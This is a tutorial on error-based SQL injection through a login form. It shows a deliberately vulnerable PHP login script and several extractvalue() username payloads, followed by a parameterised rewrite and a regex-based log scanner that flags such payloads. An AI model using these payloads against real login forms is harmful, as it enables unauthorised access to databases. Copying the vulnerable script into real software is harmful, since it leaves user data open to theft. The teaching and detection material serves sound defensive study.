
Dumping Database From Login Form

The trick itself was already covered in the earlier tutorials; a good understanding of those injections is all you need to pull data out of a login form. Still, for the sake of this tutorial and to open your mind to this kind of exploitation, we discuss here how to collect data from a login form.

First of all, there are three ways of extracting data from a login form:

1. XPath injection

2. Subquery injection

3. Blind injection (both techniques)


I strongly suggest you read all of them, because I will not discuss these injections in detail here. Only the small change in the injection is covered; everything else stays the same.


As in Bypassing Login Form with SQL Injection, we take a vulnerable login script and start exploring it.


<?php
// Vulnerable login script from the tutorial (deliberately unsafe):
// both POST values are concatenated straight into the SQL text.
// Assumes a mysql_connect() / mysql_select_db() call earlier in the script.
$uname   = $_POST['uname'];
$passwrd = $_POST['passwrd'];

$query = "select username,pass from users where username='$uname' and password='$passwrd' limit 0,1";

// mysql_query() returns false on a MySQL error; the script never checks
// for that, and the error text is what error-based injection reads.
$result = mysql_query($query);
$rows   = mysql_fetch_array($result);

if ($rows)
{
    echo "You have Logged in successfully";
    create_session();
}
else
{
    echo "Better Luck Next time";
}
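As an added example (it is not the tutorial's code), here is the same login flow rewritten so that user input can never become part of the SQL text. It assumes a mysqli connection to a database named appdb with placeholder credentials, a users table whose password column stores password_hash() output rather than plaintext, and the tutorial's own create_session() helper. The two defences it shows are the ones the vulnerable script lacks: a prepared statement with a bound parameter, and no database error text in the response.

```php
<?php
// Added example, not the tutorial's code: parameterised login with errors
// kept server-side. Database name, credentials and table layout are assumed.

// Make driver failures throw instead of returning false, and keep error text
// out of the response: the extractvalue() trick only works because the
// tutorial's script lets the MySQL error reach the browser.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
ini_set('display_errors', '0');

function authenticate(mysqli $db, string $uname, string $passwrd): bool
{
    // The placeholder fixes the SQL structure; the value travels separately,
    // so quotes, comment sequences or function calls inside $uname stay data.
    $stmt = $db->prepare('SELECT password FROM users WHERE username = ? LIMIT 1');
    $stmt->bind_param('s', $uname);
    $stmt->execute();
    $stmt->bind_result($storedHash);
    $found = (bool) $stmt->fetch();
    $stmt->close();

    // Verify against a dummy hash when the user is unknown so that the
    // response time does not reveal which usernames exist.
    $hash  = $found ? $storedHash : password_hash('placeholder', PASSWORD_DEFAULT);
    $valid = password_verify($passwrd, $hash);
    return $found && $valid;
}

$uname   = $_POST['uname']   ?? '';
$passwrd = $_POST['passwrd'] ?? '';

try {
    $db = new mysqli('localhost', 'app_user', 'app_password', 'appdb'); // placeholders
    if (authenticate($db, $uname, $passwrd)) {
        echo "You have logged in successfully";
        create_session(); // the tutorial's own session helper, assumed to exist
    } else {
        echo "Better luck next time";
    }
} catch (mysqli_sql_exception $e) {
    error_log($e->getMessage()); // details go to the server log only
    echo "Better luck next time"; // identical message for any failure
}
```

With the bound parameter, every payload listed below is compared as a literal username and simply finds no row; with display_errors off and the exception caught, even a genuine database error produces the same generic message, so there is no error channel left for extractvalue() to write into.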


Query

select username,pass from users where username='$uname' and password='$passwrd' limit 0,1

Injection

username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) and ''='

username : " or extractvalue(0x0a,concat(0x0a,(select database()))) and ""="

username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) --+

username : " or extractvalue(0x0a,concat(0x0a,(select database()))) --+

username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) #

username : " or extractvalue(0x0a,concat(0x0a,(select database()))) #

username : ' or extractvalue(0x0a,concat(0x0a,(select database()))) --

username : " or extractvalue(0x0a,concat(0x0a,(select database()))) --


You can leave the password field empty. If the page really is vulnerable, one of the variants above will work, and we continue with that one. Now let us see what query gets passed. For the query given above, the first injection works, because the script wraps the username in single quotes and the trailing and ''=' keeps that quoting balanced.
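On the defensive side, the payloads above have a recognisable shape, so login attempts can be screened for it. The following added example (not part of the tutorial) scans login-attempt log lines for three signals: a call to MySQL's extractvalue(), a SQL comment sequence, and an odd number of quote characters. The log format "<time> uname=<value> result=<ok|fail>" and the sample lines are constructed for this example.

```php
<?php
// Added example, not the tutorial's code: flag login attempts whose username
// looks like an error-based injection payload. Log format is an assumption.

function injectionSignals(string $uname): array
{
    $signals = [];
    // MySQL XML function whose error message carries attacker-chosen data.
    if (preg_match('/\bextractvalue\s*\(/i', $uname)) {
        $signals[] = 'extractvalue-call';
    }
    // Comment sequences that discard the rest of the query: "-- ", "--+", "#".
    if (preg_match('/(--[\s+]|#)/', $uname)) {
        $signals[] = 'sql-comment';
    }
    // An odd number of quotes cannot come from a plain literal value.
    if (substr_count($uname, "'") % 2 === 1 || substr_count($uname, '"') % 2 === 1) {
        $signals[] = 'unbalanced-quote';
    }
    return $signals;
}

function scanLoginLog(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        if (!preg_match('/^(\S+) uname=(.*) result=(ok|fail)$/', $line, $m)) {
            continue; // line does not match the assumed format; skip it
        }
        $signals = injectionSignals($m[2]);
        if ($signals) {
            $hits[] = ['time' => $m[1], 'uname' => $m[2], 'signals' => $signals];
        }
    }
    return $hits;
}

// Constructed sample log: one benign login, two of the tutorial's payload
// shapes, and a legitimate name containing an apostrophe.
$sample = [
    "12:00:01 uname=alice result=ok",
    "12:00:05 uname=' or extractvalue(0x0a,concat(0x0a,(select database()))) and ''=' result=fail",
    "12:00:09 uname=\" or extractvalue(0x0a,concat(0x0a,(select database()))) --+ result=fail",
    "12:00:12 uname=o'brien result=fail",
];

foreach (scanLoginLog($sample) as $hit) {
    printf("%s  %-40s  %s\n", $hit['time'], implode(',', $hit['signals']), $hit['uname']);
}
```

Note how the signals differ in strength: the first payload balances its quotes (that is exactly why it works against the single-quoted query) and is caught only by the extractvalue() check, while a name like o'brien trips the quote check alone. Treat the function-call and comment signals as strong, the lone unbalanced quote as weak, and keep the generic error message in place regardless, since detection is a complement to the parameterised query, not a substitute for it.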


